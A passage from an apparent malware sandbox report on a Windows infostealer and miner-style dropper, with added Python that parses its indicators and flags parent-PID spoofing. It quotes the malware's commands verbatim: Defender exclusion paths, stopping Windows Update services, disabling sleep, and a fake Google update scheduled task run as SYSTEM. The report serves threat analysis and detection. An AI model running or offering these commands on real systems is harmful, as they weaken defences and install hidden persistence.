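EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()   # hash of zero bytes


def parse_files_section(text):
    """Return (files, dumps). files: list of {'path', 'hashes'} in listing order;
    dumps: list of (pid, seq, start, end) with the addresses parsed as ints."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMDUMP_RE.match(line)
        if m:
            dumps.append((int(m["pid"]), int(m["seq"]), int(m["start"], 16), int(m["end"], 16)))
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current["hashes"][m["algo"]] = m["hex"]
            continue
        current = {"path": line, "hashes": {}}   # any other line opens a new file entry
        files.append(current)
    return files, dumps


def normalize_path(path):
    """Fold the report's spellings of one file: NTFS is case-insensitive, and a
    path without a drive letter is assumed to live on C: (NT object paths such
    as \\??\\pipe\\... are left alone)."""
    p = path.lower()
    if p.startswith("\\") and not p.startswith("\\??\\"):
        p = "c:" + p
    return p


def paths_by_sha256(files):
    """Group every entry with real content by SHA256 -> set of normalized paths."""
    groups = defaultdict(set)
    for f in files:
        sha = f["hashes"].get("SHA256")
        if sha and sha != EMPTY_SHA256:
            groups[sha].add(normalize_path(f["path"]))
    return groups


def dropped_executables(files):
    """One row per distinct PE (by SHA256) with every path it was written to, so
    a re-drop under a new name (setup.exe -> updater.exe) shows as one binary."""
    return sorted((sha, sorted(paths))
                  for sha, paths in paths_by_sha256(files).items()
                  if any(p.endswith(".exe") for p in paths))


def is_empty_file(entry):
    """True when the recorded hashes are those of zero bytes: the sandbox saw the
    object but captured no content, so the entry is not a hash IOC."""
    return entry["hashes"].get("SHA256") == EMPTY_SHA256


def dumps_by_pid(dumps):
    """Map pid -> sorted distinct (start, end) regions that were dumped."""
    by_pid = defaultdict(set)
    for pid, _seq, start, end in dumps:
        by_pid[pid].add((start, end))
    return {pid: sorted(regions) for pid, regions in by_pid.items()}


if __name__ == "__main__":
    files, dumps = parse_files_section(SAMPLE_LISTING)
    for sha, paths in dropped_executables(files):
        print(sha[:16], "->", ", ".join(paths))
    for pid, regions in dumps_by_pid(dumps).items():
        print(pid, [f"{s:#x}-{e:#x}" for s, e in regions])
```

Run against the full listing, dropped_executables() yields one row per distinct binary (mi.exe, cli.exe, cc.exe, and the setup.exe/updater.exe pair) regardless of how many times each path was written, and paths_by_sha256() also keeps the modified hosts file, whose hash is worth matching on endpoints alongside the PE hashes.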

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 14:46

Reported

2023-08-10 14:48

Platform

win10v2004-20230703-en

Max time kernel

101s

Max time network

140s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4672 created 2520 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
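
The rows above are the sandbox's view of parent-PID spoofing: setup.exe (PID 1252) and later updater.exe (PID 4672) create child processes whose recorded parent is Explorer.EXE (PID 2520), so anything keyed on the parent field alone (Sysmon Event ID 1, Security 4688) sees an ordinary Explorer child. The Python below is an added example, not from the report or the sandbox vendor, of the detection logic that catches this: it assumes telemetry that records, per process start, both the parent PID written into the new process and the PID of the caller that actually issued the create call (for instance the event-header ProcessId of a Microsoft-Windows-Kernel-Process ProcessStart ETW event), and flags every mismatch that is not on an allowlist of creators known to re-parent legitimately (the AppInfo service in svchost.exe does so for UAC-elevated launches). The events, PID-to-image map, allowlist and child image names are constructed; the report does not name the children.

```python
"""Flag process creations whose recorded parent is not the process that made
the create call (parent-PID spoofing via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS).

Added example, not from the report or the sandbox. Assumes telemetry that
carries, per event, 'parent_pid' as written into the new process (what Sysmon
Event ID 1 and Security 4688 show as the parent) and 'creator_pid', the PID of
the caller that issued NtCreateUserProcess (for example the event-header
ProcessId of a Microsoft-Windows-Kernel-Process ProcessStart ETW event).
"""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcStart:
    pid: int
    image: str
    parent_pid: int   # parent recorded in the new process (attacker-controlled)
    creator_pid: int  # process that actually issued the create call


@dataclass(frozen=True)
class Finding:
    child_pid: int
    child_image: str
    creator: str
    claimed_parent: str
    severity: str


# Constructed PID -> image map for the processes alive at the time.
IMAGE_OF = {
    2520: r"C:\Windows\Explorer.EXE",
    1252: r"C:\Windows\Temp\setup.exe",
    4672: r"C:\Program Files\Google\Chrome\updater.exe",
    900: r"C:\Windows\System32\svchost.exe",
}

# Constructed events mirroring the signature table: five creations by 1252 and
# one by 4672 that claim 2520 as parent (child image names are hypothetical), a
# genuine Explorer child, and a UAC elevation where the AppInfo service (hosted
# in svchost.exe) legitimately sets the requesting process as the parent.
EVENTS = [
    ProcStart(5001 + i, r"C:\Windows\Temp\child.exe", parent_pid=2520, creator_pid=1252)
    for i in range(5)
] + [
    ProcStart(5010, r"C:\Windows\Temp\child.exe", parent_pid=2520, creator_pid=4672),
    ProcStart(5020, r"C:\Windows\System32\notepad.exe", parent_pid=2520, creator_pid=2520),
    ProcStart(5030, r"C:\Windows\System32\cmd.exe", parent_pid=2520, creator_pid=900),
]

# Assumption: creators that legitimately re-parent children; AppInfo does this
# for every UAC-elevated launch. Extend from your own environment's baseline.
ALLOWED_CREATORS = {r"c:\windows\system32\svchost.exe"}

USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\")


def is_user_writable(image):
    """Heuristic: the creator runs from a location a standard user can write to."""
    low = image.lower()
    return any(seg in low for seg in USER_WRITABLE)


def detect_ppid_spoofing(events, image_of):
    """Return one Finding per event whose creator differs from the recorded
    parent, skipping allowlisted creators. Severity is 'high' when the creator
    runs from a user-writable path or the claimed parent is explorer.exe (the
    usual disguise, as in the table above), 'medium' otherwise."""
    findings = []
    for e in events:
        if e.creator_pid == e.parent_pid:
            continue
        creator = image_of.get(e.creator_pid, "<unknown>")
        if creator.lower() in ALLOWED_CREATORS:
            continue
        claimed = image_of.get(e.parent_pid, "<unknown>")
        high = is_user_writable(creator) or claimed.lower().endswith("\\explorer.exe")
        findings.append(Finding(e.pid, e.image, creator, claimed, "high" if high else "medium"))
    return findings


def creators_ranked(findings):
    """Count spoofed creations per creator image: repeated re-parenting from one
    binary (five from setup.exe above) is a stronger signal than a single event."""
    return Counter(f.creator for f in findings)


if __name__ == "__main__":
    found = detect_ppid_spoofing(EVENTS, IMAGE_OF)
    for creator, n in creators_ranked(found).most_common():
        print(f"{n} spoofed creation(s) by {creator}")
```

The creator-versus-parent comparison is the whole detection; the severity heuristic and the allowlist only rank and de-noise it. Without a telemetry source that exposes the real caller, the mismatch is invisible, which is why the sandbox's NtCreateUserProcess hook reports it and a parent-field-only log does not.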

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1536 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2876 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1536 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2216 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 4408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 2504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2216 wrote to memory of 3088 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1352 wrote to memory of 3928 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 1864 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1352 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe

"C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1536 -ip 1536

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 2620

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 126.155.241.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 126.136.241.8.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4o4jjo2n.jpm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 200f8b40e2162fb09bbc84f84f559502
SHA1 92fc86ec85056460a156b52e6777e3dfbd11ea45
SHA256 e7749b442e5d51e9afeaa58f232b57347a188b8f7ddae803925f2b272fd78254
SHA512 1fe94e44ebf6c6b34429cb97826c03d2ab2a965251a39c6d72782ab3c54e44b1c42c53e836649d3b4d97544d740d018b6b5a622a6d3d122a1df97930e9fe7c1d

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 d26057c79507673cf54b20eb167af22d
SHA1 da69e0b12eafcda43e80ebf56ad1116c9f15850a
SHA256 c3896668867a6d214162f8bc0716a71fcbf99134d6dc733170f81c61a36c5db2
SHA512 c3c44a4ee24d927f9d0cb1b281379326742e8484b41070ec3adf448b0aa5c6a6953d0e7fbee271aae4ce2b2ed143aa38567b1226486e42863a8db143a0f50ff3
